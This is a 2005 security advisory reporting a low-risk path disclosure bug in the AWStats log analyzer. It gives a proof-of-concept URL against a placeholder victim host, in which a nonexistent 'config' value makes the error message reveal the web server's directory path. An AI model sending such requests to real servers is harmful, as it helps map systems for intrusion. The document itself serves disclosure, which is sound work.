**************************************************************
* sile001 advisory                                           *
*                                                            * 
* PRODUCT: AWStats                                           *
* VERSION: 5.7 - 6.4                                         *
* VENDOR: http://awstats.sourceforge.net                     *
* VULNERABILITY: Path Disclosure                             * 
* RISK: Low                                                  *
*                                                            *
* Found by: Silentium of Anacron Group Italy                 *
*     date: 24/02/2005                                       *
*   e-mail: anacrongroupitaly[at]autistici[dot]org           *
*  my_home: http://www.autistici.org/anacron-group-italy     *
*                                                            *
**************************************************************


General product info
--------------------
AWStats (Advanced Web Statistics) is a powerful, full-featured web server
logfile analyzer which shows you all your Web statistics.
It works with IIS 5.0+, Apache and all major web, wap, proxy, streaming
server log files (and even ftp servers or mail logs) on all Operating Systems.
Current version is the 6.4.


General bug info
----------------
I have found a bug that show in error message the 
current path of http daemon.
For PoC you write how argument of variable 'config' an not exist
name refered at own config file.

Exploiting this bug
------------------- 
 
 Input in your browser:

 http://www.victim.com/cgi-bin/awstats.pl?config=silentium
 
 Output from web server:

 Error: Couldn't open config file "awstats.silentium.conf" nor "awstats.conf" 
 after searching in path "/var/www/cgi-bin,/etc/awstats,
 /usr/local/etc/awstats,/etc,/etc/opt/awstats": No such file or directory

 - Did you use the correct URL ?
 Example: http://localhost/awstats/awstats.pl?config=mysite
 Example: http://127.0.0.1/cgi-bin/awstats.pl?config=mysite
 - Did you create your config file 'awstats.silentium.conf' ?
 If not, you can run "/var/www/cgi-bin/tools/awstats_configure.pl"
 from command line, or create it manually.

 Check config file, permissions and AWStats documentation (in 'docs' directory).
   
                                 ---

You see the path of the web server:

 /var/www/cgi-bin


Patching this bug
-----------------
You search in source code the variable $config and trace it.